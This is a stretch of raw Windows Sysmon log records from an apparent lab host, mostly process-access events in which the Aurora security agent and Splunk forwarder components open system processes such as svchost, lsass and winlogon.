Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:31.167{FE4C2B44-E6A2-63C7-A706-00000000AF02}78847888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.972{FE4C2B44-E6A4-63C7-A906-00000000AF02}79687972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.822{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A4-63C7-A906-00000000AF02}7968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.820{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.820{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.820{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.820{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.819{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E6A4-63C7-A906-00000000AF02}7968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.819{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A4-63C7-A906-00000000AF02}7968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.818{FE4C2B44-E6A4-63C7-A906-00000000AF02}7968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.554{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1026C30948F3B051DECFEB3AE754663D,SHA256=98423D5CD8DF9CA968DC16BD4C616FB33528D796FE0959A37FF937669DEE0586,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.324{FE4C2B44-E6A4-63C7-A806-00000000AF02}79287932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A4-63C7-A806-00000000AF02}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 